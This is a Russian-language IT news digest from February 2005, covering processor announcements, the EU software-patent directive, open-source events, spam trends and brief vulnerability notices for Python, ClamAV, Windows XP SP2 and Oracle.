В 2005 году Sun Microsystems пройдет важную веху, завершив разработку двух последователей процессора с кодовым названием Niagara. Это чип второго поколения Niagara II и чип Rock, которые должны появиться в системах в 2008 году. В Rock применяются некоторые технологии Niagara, предназначенные для параллельного решения нескольких задач, но он рассчитан на более сложные и ресурсоемкие задачи. В среду на ежегодной конференции компании для аналитиков в Санта-Кларе (штат Калифорния) генеральный директор Sun Скотт Макнили сказал, что работа над обоими чипами идет полным ходом. «В этом году мы выведем Rock на ленту, как и вторую версию Niagara», — сказал он. Этап вывода на ленту означает, что инженеры передают готовую конструкцию — зафиксированную на магнитных лентах — на завод для изготовления. Между тем процессор Niagara будет готов в самом ближайшем будущем. Дэвид Йен, исполнительный вице-президент отделения масштабируемых систем Sun, продемонстрировал прототип системы Niagara, исполняющий Java-программу под Solaris 10. Сейчас Sun выпускает по несколько опытных систем Niagara в неделю для внутреннего тестирования. Sun активно продвигает серверы с процессорами х86, главным образом AMD Opteron. Но компания работает и над тем, чтобы семейство Sparc не отставало от х86, IBM Power и Intel Itanium.
Подробности

5/02/2005 12:38 Европарламент потребовал пересмотра директивы о патентовании ПО
Противники патентов на программное обеспечение торжествуют: ЕС придется заново переписать директиву Computer Implemented Inventions Directive. В среду вечером в ходе борьбы за предотвращение принятия европейского закона о патентовании программного обеспечения была одержана важная победа: юридический комитет Европарламента (JURI) потребовал переработать директиву Computer Implemented Inventions Directive (CIID). В четверг представитель Европарламента подтвердил, что президент Европейского парламента попросит Европейскую Комиссию (ЕК) вернуть директиву о патентовании ПО на доработку. Член Европарламента от Финляндии Пииа-Ноора Кауппи, который председательствовал на заседании JURI, сказал, что это решение получило значительную поддержку со стороны членов юридического комитета. «Решение принято подавляющим большинством членов комитета и при поддержке всех крупных политических групп». Противники директивы опасаются, что она откроет двери для широкого патентования программного обеспечения в Европе — однако сторонники директивы это отрицают. Флориан Мюллер, менеджер веб-сайта антипатентной кампании, назвал это великой новостью, но предупредил, что борьба еще не окончена. «Это фантастический поворотный момент, так как теперь нам, по всей вероятности, удастся покончить с прошлогодним текстом Совета, — говорит Мюллер. — FFII и другие участники антипатентной кампании получили шанс еще больше сплотить свои ряды. Но то же делают и наши противники — они не собираются сдаваться». Представитель Европарламента сказал, что ЕК не обязана соглашаться с запросом на переработку документа, но, скорее всего, выполнит волю парламента. Однако по словам представителя ЕК, комиссия еще ничего не решила, «оставляет право решения за собой» и «посмотрит, как поступит Совет Европы».
ZDNet

5/02/2005 11:55 Новый вице-премьер Украины доказал факт вмешательства в работу системы "Выборы"
В пятницу новый вице-премьер Украины по вопросам европейской интеграции Олег Рыбачук заявил, что факт несанкционированного доступа к серверу ЦИК Украины во время второго тура выборов президента доказан, передает агентство "РосБизнесКонсалтинг". После второго тура президентстких выборов 21 ноября 2004 года нынешний президент Украины Виктор Ющенко отказался признать победу Виктора Януковича. Вскоре Верховный суд страны отменил те результаты и назначил переголосование во втором туре. 26 декабря 2004 года в соответствии с измененным избирательным законодательством и при новом главе Центризбиркома переголосование состоялось, и президентом был избран Виктор Ющенко. По словам разработчиков информационно-аналитической системы "Выборы", осуществлявшей электронный подсчет голосов, в ходе ноябрьского голосования она работала нетипично. Незадолго до переголосования ЦИК принял дополнительные меры для обеспечения безопасности и стабильной работы системы.
РБК

4/02/2005 16:16 Презентация нового способа SQL-атаки
Способов внедрения SQL-кода (называемого как SQL-Injection) на данный момент известно довольно много. Но вот господин Esteban Martínez Fayó из Аргентины утверждает,что им представлен новый способ SQL-атаки на сервера под управлением СУБД Oracle. Помимо описания типов атак описываются способы защиты от них.
Описание

4/02/2005 15:40 Уязвимость в Python
Guido van Rossum от имени разработчиков популярного языка Python сообщает о наличие уязвимсости в этом языке. Уязвимость присутстсвует в библиотечном модуле SimpleXMLRPCServe и позволяет удалённому атакующему получить доступ к внутренним данным зарегистрированных объектов (internals of the registered object). Уязвимость присутствует только в случае использования Python XML-RPC сервером register_instance()-метода для регистрации объектов без использования метода _dispatch(). Для версий 2.2, 2.3, 2.4 интерпретатора Питон выпущены патчи.
Описание

4/02/2005 14:31 Выпущен Blin-2.0 Desktop Edition
Blin Desktop - однодисковая редакция дистрибутива Blin, рассчитанная на домашнее или офисное использование. Cистема традиционно не требует установки на жесткий диск, работает прямо с компакт-диска (LiveCD - Дистрибутив). При копировании системы на жесткий диск, можно добиться заметного ускорения в работе, при этом привод CD-ROM освобождается и может быть использован по прямому назначению. Система построена на основе ядра версии 2.6.10. В качестве кодировки по умолчанию используется UTF8. Выпускают дистрибутив ребята из украинского (если кто не знает) города Запорожье (за что им отдельный респект).
Cайт проекта

4/02/2005 13:55 На конференции по Linux выступит 13-летняя докладчица
В этом году на конференции linux.conf.au в Австралии выступит юная Linux-гуру. Элизабет пользуется компьютером с двух лет, а с Debian работает с девяти лет. Судя по ее биографии, приведенной в списке докладчиков, ей еще не было десяти, когда она установила Debian GNU/Linux на сервер, "доказав, что инсталляция Debian на самом деле не так уж и сложна", хотя следует учесть, что "папа был рядом, чтобы ответить на вопросы в случае затруднений". Kак сообщает ZDNet, Элизабет проведет семинар "Расширяй Tuxracer - учись, играя", темой которого, по словам председателя оргкомитета 2005 Стивена Хэндли, будет создание вариантов Tuxracer (популярной игры open source с участием симпатичного талисмана Linux), которые делали бы игру еще увлекательнее.
Подробности

4/02/2005 12:57 Линус Торвальдс: открытый код пишут не ради денег
«Если Вы хотите заняться разработкой ПО с открытым исходным кодом ради карьеры, то Вы выбираете неверный путь», — сказал создатель Linux Линус Торвальдс (Linus Torvalds). Хотя сам «отец» систем с открытым исходным кодом зарабатывает неплохие деньги, он считает, что в мире open source смогут удержаться лишь настоящие энтузиасты. Свою речь Торвальдс произнес на корпоративном саммите по Linux, организованной Лабораторией разработок с открытыми исходниками (OSDL). Будущее такого ПО зависит от талантливых, увлеченных программистов, переполняемых идеями и иницативами, а не от тех, кто на первое место ставит свои или корпоративные финансовые интересы, считает г-н Торвальдс. В саммите также участвовали основатель и президент Apache Software Foundation Брайан Белендорф (Brian Behlendorf), основатель и председатель Фонда приложений с открытыми исходниками (OSAF) Митч Кепор (Mitch Kapor), главный сборщик ядра Linux Эндрю Мортон (Andrew Morton) и исполнительный директор OSDL Стюарт Коэн (Stuart Cohen). Г-н Белендорф сказал, что черты, которые определяют успешного программиста открытых программ, отличаются от личностных характеристик, ведущих к успеху в коммерческом софтверном бизнесе: «В open source вы должны быть более коммуникабельны и воспринимать себя с юмором. Здесь не так много места для примадонн». В его понимании, подходящий для индустрии программист должен быть не слишком ранимым человеком, готовым выставить свою работу на обозрение всего мира.
CNews

4/02/2005 12:15 Novell обещает долго поддерживать NetWare
NetWare и GroupWise будут поддерживаться до 2010 года и позднее: до тех пор, «пока позволяет конъюнктура рынка». В среду компания Novell развеяла опасения по поводу возможного скорого прекращения поддержки некоторых своих проприетарных приложений, заверив, что она намерена поддерживать следующие версии GroupWise и NetWare по крайней мере до конца текущего десятилетия. На прошлой неделе некоторые заказчики высказали обеспокоенность тем, что Novell может прекратить поддержку проприетарных приложений и сосредоточиться на Linux и приложениях open source. В частности, указывали на GroupWise, инструмент электронной почты и коллективной работы Novell, который по своей функциональности пересекается с SuSE Linux Openexchange Server и Evolution. Однако директор европейского отделения Novell по Linux-решениям Брайан Грин сообщил ZDNet UK, что следующая версия GroupWise, как он ожидает, выйдет в июне 2005 года и будет поддерживаться в течение как минимум пяти лет, как и SuSE Linux Enterprise Server 9.
Подробности

4/02/2005 11:49 Разработчики Linux создают специальный форум для сообщений об уязвимостях
Разработчики ядра Linux организуют список почтовой рассылки для обмена информацией о секьюрити-багах, обнаруженных в ядре операционной системы с открытым исходным кодом. Список, о котором разработчики планируют объявить в ближайшее время, служит ответом на подозрения о том, что некоторые сообщения об уязвимостях теряются в большом количестве писем, направляемых в группу разработки ядра. «Наша цель — сохранять процесс как можно более открытым, — сказал Крис Райт, разработчик ядра Linux из Open Source Development Labs. — Иногда программисты предпочитают сообщать о секьюрити-багах частным образом, чтобы до обнародования этой информации успеть оценить последствия и подготовить поправку. Список поможет гарантировать это и не даст таким сообщениям затеряться». Список почтовой рассылки, который станет контактной точкой для сообщений о проблемах безопасности ядра, явился результатом нескольких недель споров по поводу того, насколько доступным он должен быть для широкой публики. Вопрос обнародования информации о проблемах безопасности вызывает острые споры не только в группе разработке ядра, но и в сообществе программистов в целом. Одни утверждают, что разглашение сведений об ошибках в программах подрывает безопасность интернета, другие настаивают на том, что ошибки обычно бывают вызваны плохой организацией разработки и недостаточным вниманием к вопросам безопасности. Практика, принятая в индустрии коммерческого ПО, состоит в требовании, чтобы эксперты, обнаружившие ошибки, дожидались, пока софтверная компания выпустит исправление, прежде чем обнародовать детали найденной уязвимости. Однако создатель оригинального ядра Linux Линус Торвальдс отвергает этот подход. «Лично я предпочитаю максимально возможную открытость; она создает очень комфортные условия, — сказал он в недавнем интервью по e-mail CNET News.com. — Это требует достижения определенного уровня безопасности — и в то же время побуждает стремиться к нему, а те, кого в какой-то момент времени этот требуемый уровень безопасности начинает раздражать, восстают против открытости».
Проект заявления

4/02/2005 11:19 Фильтры больше не смогут защитить пользователей от спама
Одна из самых популярных программ по рассылке спама Send-Safe обзавелась новой функцией, которая позволяет обходить почтовые фильтры. Как сообщает MSNBC, специалисты по компьютерной защите опасаются, что теперь количество спама значительно увеличится, так его нельзя будет идентифицировать. Как правило зараженные компьютеры при подключении к интернету незаметно для своего владельца занимаются рассылкой спама в автоматическом режиме. Фильтры заносят их IP-адреса в черные списки и в дальнейшем игнорируют приходящие с них сообщения. Однако теперь программа Send-Safe позволяет спамерам замаскировать свою рассылку под сообщения, приходящие напрямую с сервера интернет-провайдера. Поскольку удалять всю почту, посланную с сервера нереально, то вместе с нормальной корреспонденцией на персональные компьютеры может легко проникнуть и спам. Тем не менее, некоторые специалисты не считают, что новая характеристика спамерской программы создаст слишком большие проблемы. Он предлагают, прекращать прием сообщений от пользователя, если оно превысит определенный лимит, например, 5 тысяч, за установленное время. Отметим, что, по оценкам экспертов, три четверти электронных почтовых сообщений приходится на спам. И в ближайшее время его объем может только увеличиться.
Подробности

3/02/2005 20:11 Секреты ядерщиков утекают через "дыры" в ИТ-секторе
Правительство США урезало на две трети финансирование Национальной лаборатории ядерных исследований в Лос-Аламосе после того, как был выявлен ряд серьезных проблем в области обеспечения безопасности ИТ-систем. Решение об урезании финансирования Университету Калифорнии, руководящему органу лаборатории, приняла Национальная администрация по ядерной безопасности (NNSA). Уязвимости в ИТ-системе были обнаружены после многочисленных расследований по поводу двух пропавших дисков с секретной информацией, которые, как впоследствии выяснилось, не существовали. «Несмотря на то, что многочисленные расследования подтвердили то, что якобы утерянные диски никогда не существовали, обнаружилось множество фактов халатности при управлении секретными материалами, что абсолютно недопустимо. Университет Калифорнии должен понести за это ответственность», — сказал администратор NNSA Линтон Брукс (Linton Brooks). По контракту, университету выплачивается в год £2 млн. В зависимости от результатов работы, сумма может увеличиваться еще на £3 млн. После расследования финансирование сокращено до £1,6 млн.
CNews

3/02/2005 19:50 Государство взялось за IP-телефонию
Судя по всему, власть по какой-то причине решила объявить войну операторам IP-телефонии. В ближайшее время правительство должно утвердить новые правила лицензирования этой отрасли. Согласно официальной позиции, введение жесткого регулирования IP-телефонии связано с грядущей демонополизаций рынка дальней связи, что является одним из условий членства России во Всемирной торговой организации (ВТО). Власти готовят почву к деятельности в новых условиях. Возможно, ограничение IP-телефонии имеет под собой не только экономическую, но и политическую подоплеку. Это логичная мера для страны, которая стремится максимально контролировать коммуникации своих граждан и где спецслужбы имеют большое влияние на власть. Яркий тому пример — Беларусь, где коммерческая IP-телефония запрещена в принципе, а тех, кто пытается предоставлять такие услуги без лицензии (лицензий никому не дают), просто сажают в тюрьму. Причин для запрета IP-телефонии две. Во-первых, государственный провайдер-монополист «Белтелеком» может многократно завышать цены на междугородние телефонные переговоры, занижая при этом социальные тарифы на переговоры внутри страны. Во-вторых, спецслужбы могут контролировать все коммуникации, которые осуществляются централизованно через «Белтелеком». Возможно, в России ситуация развивается аналогичным образом. Вполне естественно, что управляемая спецслужбами реформа может осуществляться под прикрытием рыночных или социальных лозунгов. Оправдывая реформу IP-телефонии, власти могут говорить о социальном характере реформ или о грядущей «демонополизации» рынка. Мол, операторы должны обеспечить связью всю Россию (социальная функция), а только потом начинать зарабатывать деньги, т.е. выходить на рынок междугородней IP-телефонии. На практике это выглядит следующим образом. Согласно двум разработанным нормативным актам к закону «О связи» — Перечню лицензируемых услуг и Правилам присоединения сетей электросвязи, — операторы IP-телефонии будут обязаны получить лицензию на дальнюю голосовую связь. Но это возможно только в том случае, если оператор обеспечит предоставление услуг на всей территории Российской Федерации. Другими словами, операторов IP-телефонии приравнивают к обычным операторам связи.
Вебпланета

3/02/2005 14:45 Разработчики Linux хотят оперативней обрабатывать сообщения об уязвимостях
Список, о котором разработчики планируют объявить в ближайшее время, служит ответом на подозрения о том, что некоторые сообщения об уязвимостях теряются в большом количестве писем, направляемых в группу разработки ядра. «Наша цель — сохранять процесс как можно более открытым, — сказал Крис Райт, разработчик ядра Linux из Open Source Development Labs. — Иногда программисты предпочитают сообщать о секьюрити-багах частным образом, чтобы до обнародования этой информации успеть оценить последствия и подготовить поправку. Список поможет гарантировать это и не даст таким сообщениям затеряться». Список почтовой рассылки, который станет контактной точкой для сообщений о проблемах безопасности ядра, явился результатом нескольких недель споров по поводу того, насколько доступным он должен быть для широкой публики. Вопрос обнародования информации о проблемах безопасности вызывает острые споры не только в группе разработке ядра, но и в сообществе программистов в целом. Одни утверждают, что разглашение сведений об ошибках в программах подрывает безопасность интернета, другие настаивают на том, что ошибки обычно бывают вызваны плохой организацией разработки и недостаточным вниманием к вопросам безопасности. Практика, принятая в индустрии коммерческого ПО, состоит в требовании, чтобы эксперты, обнаружившие ошибки, дожидались, пока софтверная компания выпустит исправление, прежде чем обнародовать детали найденной уязвимости. Однако создатель оригинального ядра Linux Линус Торвальдс отвергает этот подход. «Лично я предпочитаю максимально возможную открытость; она создает очень комфортные условия, — сказал он в недавнем интервью по e-mail CNET News.com. — Это требует достижения определенного уровня безопасности — и в то же время побуждает стремиться к нему, а те, кого в какой-то момент времени этот требуемый уровень безопасности начинает раздражать, восстают против открытости».
SecurityLab

3/02/2005 13:41 Ошибки во встроенном файрволле Linux
Сотрудниками компании BiLiM Systems обнаружены и устранены ошибки в исходных кодах netfilter (встроенный файрволл в ядрах Linux - ядро версии 2.6.10) и iptables (модуль libipt_hashlimit). В официальное ядро версии 2.6.10 была включена поддержка в правилах iptables условий hashlimit, позволяющих задавать пороги соответствия для квартетов (srcaddr, srcport, dstaddr, dstport) подобно тому, как условие limit позволяло задавать пороги для всех адресов сразу. К сожалению, модуль libipt_hashlimit.c (iptables) для работы с этим условием содержит целый ряд ошибок при обработке параметров и эти ошибки просто не позволяют использовать модуль. После обнаружения ошибок был незамедлительно (22 января 2005 года) проинформирован разработчик модуля Harald Welte и открыт Bug Track. В исходный код данного модуля были внесены изменения. После устранения ошибок в модуле iptables было проведено тщательное тестирование модуля netfilter (ipt_hashlimit.c), обеспечивающего поддержку соответствия hashlimit в ядре Linux. В модуле также были обнаружены две ошибки, которые, к счастью, не оказывают критического воздействия на работу системы и не снижают уровня безопасности, однако существенно затрудняют использование соответствия hashlimit. По результатам проверки 26 января также были направлены сообщения разработчикам и открыт Bug Track.
Подробности

3/02/2005 10:49 Выпущен язык программирования Python для платформы Series 60
На сайте компании Nokia появилась версия открытого языка программирования Python для мобильной платформы Series 60. Версия Python for Series 60 основана на версии Python 2.2.2. Помимо большинства стандартных библиотек, Python for Series 60 включает ряд специфичных модулей для работы с графическим интерфейсом смартфонов, беспроводной связью Bluetooth, системой пакетной передачи данных GPRS, SMS, информацией, передаваемой базовыми станциями сотовой сети, и пр. Как отмечается, используя Python, разработчики смогут более полно реализовать возможности платформы Series 60. Кроме того, данный язык программирования должен ускорить и облегчить процесс разработки "мобильных" приложений. В настоящее время для загрузки доступны две модификации Python for Series 60, предназначенные для платформ Series 60 и Series 60 SE, соответственно. Дистрибутив включает в себя инсталляционный файл в формате SIS (Symbian Installation System), сопутствующую документацию, примеры скриптов и дополнительные библиотеки. Язык программирования Python for Series 60 был протестирован на коммуникаторах Nokia 6600, 6630, 7610 и N-Gage QD.
Подробности

3/02/2005 10:23 Российское средство защиты данных в SAP
НПО "Мекомп" разработало новое средство защиты информации, совместимое с решениями для управления бизнесом компании SAP - "Мекомп-Крипто". Данный продукт обеспечивает защиту информации, обрабатываемой системами SAP с помощью отечественных средств криптографии, соответствует всем требованиям Гостехкомиссии РФ и сертифицирован Центром безопасности связи ФСБ/ФАПСИ РФ и Центром сертификации компании SAP. "Мекомп-Крипто" интегрирует российские сертифицированные криптографические средства "КриптоПро CSP" и "КриптоПро TLS" (в разработке продукта принимали участие удостоверяющий центр "КриптоПро УЦ" и компания "Крипто-Про") с механизмами защиты информации, реализованными в программных продуктах SAP. Функционирующий в среде ОС Windows 2000, AIX, Solaris, HP-UX и Linux, данный программный комплекс предусматривает криптографическую аутентификацию взаимодействующих сторон, обеспечение целостности и конфиденциальности данных, передаваемых между компонентами решений SAP. В продукте реализована технология открытых ключей PKI (Public Key Infrastructure), предусматривающая интегрированный набор служб и средств администрирования для создания и развертывания приложений, применяющих криптографическую защиту информации с сертификатами открытых ключей.
"Открытые системы"

3/02/2005 10:18 Обзор вирусной активности за январь от "Лаборатории Касперского"
"Лабораторией Касперского" выпущен традиционный ежемесячный обзор вирусной активности прошедшего меясца. Январь 2005 года не внес каких-либо значительных перемен в расстановку сил во вредоносном почтовом трафике. По-прежнему первые два места занимают черви семейства Zafi, а за ними следует самый распространенный червь 2004 года – Netsky.q. Другой ветеран вирусного хит-парада – Lovgate.w, не отдает завоеванных позиций, продолжая удивлять своей живучестью. Кстати, в самом конце вирусной двадцатки находятся еще два червя того же семейства и, учитывая историю развития более ранних вариантов Lovgate, можно предположить, что они еще долго будут присутствовать в рейтингах активности вредоносных программ. Отдельного внимания заслуживает новичок рейтинга – Bagle.ay. В январе 2005 года исполняется ровно год с момента обнаружения первого варианта червя данного семейства. И снова, как и год назад, Bagle оказался первой серьезной эпидемией нового года, чье распространение было определено как максимально опасное («красный» уровень опасности) по классификации «Лаборатории Касперского». Появившаяся на свет 27 января, версия Bagle.ay смогла достичь 8-го места в рейтинге всего за несколько дней. Как и более ранние варианты, эта версия Bagle также устанавливает на зараженную машину троянский прокси-сервер, позволяя злоумышленникам в дальнейшем рассылать через нее спам или новые версии червя.
Обзор

3/02/2005 09:05 Новый трюк с зомбированными ПК ведет к взрывному росту спама
Эксперты предупреждают, что спамеры придумали новый маневр, значительно затрудняющий борьбу с ними. Британская компания SpamHaus Project, которая специализируется на составлении черных списков спамеров и блокирует по 8 млрд писем в день, предупреждает о появлении нового вида злокачественного ПО. Оно зомбирует персональные компьютеры, которые затем используются для рассылки спама через почтовый сервер интернет-сервис-провайдера, обслуживающего этот ПК. В результате письма приходят якобы от ISP, что значительно затрудняет их блокировку. До сих пор зомбированные ПК сами применялись в качестве почтовых серверов, рассылая спам непосредственно получателям. «Троянец может заставить прокси-серверы направлять спам своему ISP», — говорит директор SpamHaus Стив Линфорд. Он уверен, что этот троянский конь создан теми же людьми, которые пишут спамерское ПО. Возможно, что американские ISP уже задействованы по этой схеме. «Мы наблюдали резкий всплеск спама, исходящего от крупных ISP. Теперь от почтовых серверов всех ISP поступает очень большое количество спама», — говорит Линфорд. Это создаст серьезные проблемы для инфраструктуры e-mail, так как блокировать почту по именам доменов крупных ISP не имеет смысла. Линфорд прогнозирует, что в ближайшую пару месяцев ISP зафиксируют рост объема получаемой и рассылаемой ими почты, а уровень спама в течение года увеличится с 75% всех электронных сообщений до примерно 95%. «Инфраструктуру e-mail начинает заклинивать, — предупреждает Линфорд. — Готовьтесь к гигантским задержкам при доставке e-mail и отказам серверов. Это начало краха системы электронной почты». Чтобы взять проблему под свой контроль, ISP должны действовать быстро. «Им нужно ограничить число электронных писем, поступающих от пользователей ADSL. Им нужно срочно начать отфильтровывать входящие вирусы. У ISP слишком много спама и слишком мало людей, чтобы обзванивать пользователей и сообщать им, что их машины зомбированы. Тем более, что никто не понимает, о чем вы толкуете». Антиспамерская компания MessageLabs подтвердила слова Линфорда. «Таким способом спамеры затрудняют ведение черных списков, — говорит главный технолог MessageLabs Марк Саннер. — Это делает ISP в большей степени заинтересованными в фильтрации своего трафика».
Подробности

2/02/2005 20:54 Symbian анонсировал более мощную ОС для смартфонов
По сообщению Reuters, британский разработчик программного обеспечения для мобильных телефонов Symbian, частично принадлежащий Psion, объявил о появлении новой версии своей операционной системы, которая поддерживает камеры с высоким разрешением и трехмерную графику. Программное обеспечение, которое должно работать на базе более быстрых процессоров, взяло за основу концепции британского разработчика чипов ARM, что позволит производителям сэкономить время и средства на создание новых моделей. ПО может обрабатывать картинки разрешением 2 мегапикселяи выше, также оно способно передавать музыку в режиме стерео и импортировать MP3-файлы с десктопа без дополнительных синхронизирующих программ. Первые телефоны на базе Symbian 9 версии будут представлены во второй половине 2005 года. В настоящий момент на базе Symbian работают около 20 млн. мобильных телефонов более 200 мобильных операторов по всему миру. Согласно прогнозам IDC, к 2008 году будет продано 130 млн. смартфонов. С одного проданного телефона Symbian получает доход в размере от $5 до $7,25.
CNews

2/02/2005 19:50 FSF: Новая лицензия Microsoft погубит Samba
Предложенная корпорацией Microsoft лицензия серверного взаимодействия со своими продуктами сделает невозможным использование таких open-source программ, как Samba. Организация свободного программного обеспечения FSF (Free Software Foundation) просит Европейский союз не принимать серверную лицензию, предложенную Microsoft вслед за антимонопольным постановлением. Представители FSF утверждают, что, по новым условиям Microsoft, программное обеспечение с открытым кодом (например, Samba) не сможет взаимодействовать с продукцией корпорации. Microsoft обещала представить лицензии, которые позволят конкурирующим производителям серверного ПО создавать приложения, способные «достичь полного взаимодействия» с клиентскими и серверными Windows. Но предложенная лицензия, получившая название WSPP Development Agreement, требует денежных отчислений Microsoft на получение права использования технической документации, необходимой для реализации работы с серверными протоколами. Карло Пиана (Carlo Piana) из миланской компании Tamos Piana & Partners, представляющий европейское подразделение FSF (FSF Europe), заявил, что предлагаемая лицензия несовместима со свободным программным обеспечением и он надеется, что Европейское сообщество потребует от Microsoft пересмотра этого вопроса.
Nixp.Ru

2/02/2005 19:47 Греческим компаниям запретили перлюстрировать электронную почту служащих
Регулирующий орган Греции утвердил постановление, согласно которому работодатели не имеют права просматривать электронную почту своих сотрудников, сообщает AFP. Необходимость в такого рода постановлении возникла, после того как в контрольную организацию обратились служащие компании, название которой не указывается. Сотрудники компании были крайне недовольны тем, что работодатели имеют прямой доступ к их электронной переписке. Согласно их заявлению, руководство компании не поставило их в известность о том, что на сервере было установлено специализированное программное обеспечение, которое позволяло просматривать реестр всех посещаемых сотрудниками сайтов. Помимо этого, электронные ящики служащих были заблокированы, поскольку в компании посчитали, что трафик электронных писем превышает все допустимые нормы. Греческое Управление по защите данных (DPA) заявило, со своей стороны, что полная свобода, которая в результате вынесенного решения будет предоставлена служащим, также не является корректным решением существующей проблемы.
"Компьюлента"

2/02/2005 19:12 Microsoft считает, что дыра в Windows ХР SP2 не опасна
Корпорация Microsoft утверждает, что найденная недавно дыра в операционной системе Windows ХР со вторым сервис-паком, не представляет угрозы для пользователей. Уязвимость, о которой идет речь, была обнаружена сотрудниками российской фирмы Positive Technologies. Проблема связана с ошибками в реализации механизма защиты Data Execution Protection (DEP), предназначенного для предотвращения выполнения вредоносного кода, замаскированного вирусом под какую-либо безвредную информацию. Теоретически дыра может использоваться злоумышленниками с целью выполнения произвольных операций на удаленном компьютере. Более того, эксперты Positive Technologies даже продемонстрировали методику реализации атаки. Однако в Microsoft утверждают, что использовать дыру на практике невозможно. Кроме того, в электронном письме, направленном журналистам сетевого издания CNET News, софтверный гигант подчеркивает, что механизм Data Execution Protection разрабатывался, с тем чтобы затруднить проведение атак, а не полностью предотвратить их. К тому же, отмечают в Microsoft, программисты софтверного гиганта постоянно работают над повышением функциональности данного защитного комплекса.
Подробности

2/02/2005 18:36 Министр связи защитил Интернет от цензуры
Министр информационных технологий и связи РФ Леонид Рейман выступил против введения цензуры или системы фильтрации контента в Интернете. "Интернет развивается хорошо, и наша задача - чтобы он так и развивался", - заявил Рейман в интервью сетевому изданию "Газета.Ru". По словам министра, распространение информации в Интернете регламентируется законом о СМИ. При этом Рейман выступил за подготовку юридических норм, касающихся "регулирования информации между поставщиком и потребителем". Рейман сообщил, что Министерство информационных технологий и связи готово представить свои предложения по этому вопросу. Рейман также высказался по поводу борьбы с распространением несанкционированной рекламы в Интернете. По его словам, Министерство информационных технологий и связи не планирует вводить централизованное регулирование и принимать "национальные специальные меры". "Будем двигаться в рамках решений, которые принимает международная общественность, и в рамках технических решений, которые имеют компании, производящие программное обеспечение и аппаратные средства - они предусматривают подобного рода защитные устройства", - заявил Рейман. В последнее время российские чиновники неоднократно выступали за государственное регулирование Интернета. В ноябре прошлого года министр иностранных дел РФ Сергей Лавров заявил, что многие ресурсы всемирной сети пропагандируют нетерпимость и насилие. При этом Лавров упомянул сайт чеченских сепаратистов "Кавказ-центр". Министр образования Андрей Фурсенко, говоря о регулировании Интернета, пожаловался на чрезмерное увлечение людей виртуальном миром. Он заявил, что это может привести к возникновению серьезных социальных проблем.
Источник

2/02/2005 18:23 Google стал регистратором доменных имен
Google Inc. продолжает расширять свою сферу влияния в Интернете. После заключения договора с ICANN (Internet Corporation for Assigned Names and Numbers) поисковый гигант стал еще и официальным регистратором доменных имен. Представитель Google заявил, что компания не собирается заниматься продажей доменных имен. Статус регистратора нужен компании для того чтобы больше узнать о доменах и использовать эти знания для улучшения своей поисковой системы.
Источник

2/02/2005 18:11 Sun начинает торговать вычислениями как книгами и билетами
Sun Microsystems надеется, что биологи и геологи станут покупать вычислительную мощность через веб в ее новой сети Sun Grid, как покупают авиабилеты или ищут информацию при помощи Google. Во вторник руководители Sun представили Sun Grid, крупную вычислительную сеть, предоставляющую вычислительную мощность с оплатой «по счетчику», и рассказали, каким образом ресурсные вычисления изменят мир вычислительной техники, подобно электроэнергетическим сетям, изменившим способ продажи электроэнергии. В системе Sun Grid потребители платят по $1 за каждый ЦП-час — час работы центрального процессора компьютера — и решают свои вычислительные задачи на серверах и системах хранения данных, принадлежащих и эксплуатируемых Sun. При решении этих задач одновременно используется множество процессоров. В ходе демонстрации операционный директор Sun Джонатан Шварц направил в Sun Grid задачу построения графической модели процесса свертывания белка. Решение заняло всего несколько секунд, но обошлось в $12. Выданный Шварцу счет на 12 часов машинного времени сложился из нескольких секунд работы каждой из сотен машин, одновременно набросившихся на задачу.
Подробности

1/02/2005 18:31 Уязвимость в ClamAV
Обнаружена уязвимость в популярном в мире открытых систем антивирусе ClamAV (он же Clam AntiVirus). В результате ошибки при обработке ZIP-файла (заархивированного специальным образом и прикреплённого к письму) возникает возможность вызвать переполнение буфера, что, в свою очередь, может привести к ситуации DoS. Стоит признать, что производители дистрибутивов Linux выпустили обновлённые версии этого продукта.
Подробности

1/02/2005 16:41 Netscape готовит браузер с защитой от фишинг-атак
Тестовая версия интернет-браузера Netscape 8 со встроенной защитой от фишинг-атак должна появиться на свет до конца этого месяца, сообщает сайт News.com. В настоящее время компания Netscape ведет переговоры с несколькими компаниями, специализирующимися на IT-безопасности. Предмет переговоров — снабжение Netscape «черными списками» веб-ресурсов, связанных с фишинг-схемами или распространяющих шпионские программы. Когда пользователь 8-й версии Netscape окажется на одном из таких ресурсов, браузер даст соответствующее предупреждение и заблокирует работу всех потенциально опасных скриптов. Безопасные сайты Netscape будет заносить в «белый» список. Посещая их, пользователь будет видеть в строке браузера зеленый значок. Ресурсы, данными о которых браузер не располагает, будут помечаться желтым значком. Создание браузера с защитой от фишинг-атак — новая попытка Netscape занять позиции, с которых компанию вытеснила Microsoft со своим Internet Explorer. До появления этого браузера, которым сейчас пользуются до 90 процентов посетителей интернета, Netscape занимала 80 процентов рынка. Впрочем, у еще не появившегося браузера Netscape 8 уже есть конкурент. Около месяца назад был выпущен браузер Deepnet Explorer. Его авторы взяли за основу Internet Explorer, создали для него собственную оболочку и снабдили свою программу защитой от фишинг-атак.
Подробности

1/02/2005 15:08 «Стрим» меняет тарифы
С 1 февраля 2005 г. в «Стрим» вводятся новые тарифные планы. Как сообщается, тарифы «Стандарт», «Актив» и «Супер» окончательно уходят в прошлое, а им на смену приходят более скоростные, более «вместительные» «Турбо», «Квадро» и «Торнадо». В тарифный план «Турбо» включено вдвое больше трафика, чем в «Стандарт». В «Квадро» по сравнению с «Активом» абонентская плата ниже на 30%, а объем включенного трафика выше почти вдвое. Наконец, абонентская плата в «Торнадо» по сравнению с тарифом «Супер» ниже на 25%, а объем включенного трафика больше на 50%. Также произошли изменения и в тарифных планах с неограниченным объемом трафика. В период с 1 февраля до 30 апреля 2005 г. вводятся новые тарифные планы семейства «Нео». Теперь пользователям, а также всем желающим подключиться к «Стрим» доступны два безлимитных тарифа — «Стрим Нео 20» и «Стрим Нео 25». Тариф «Стрим Нео 20» дает возможность пользователю подключаться к интернету со скоростью 128 кбит/с. Абонентская плата составляет $20 в месяц. Подключаясь по тарифу «Стрим Нео 25» пользователь получает в свое распоряжение интернет-канал с вдвое большей скоростью входящего потока данных — 256 кбит/с (указана скорость канала «к абоненту», скорость канала «от абонента» — 128 кбит/с). При этом ежемесячная плата составит $25. Переход абонентов на новые тарифные планы составляет $18. Исключение составляют лишь абоненты, уже подписанные на тариф «Нео». Для них переход осуществляется бесплатно.
Сайт

1/02/2005 14:25 IBM представила недорогой сервер с процессорами Power5 под управлением Linux
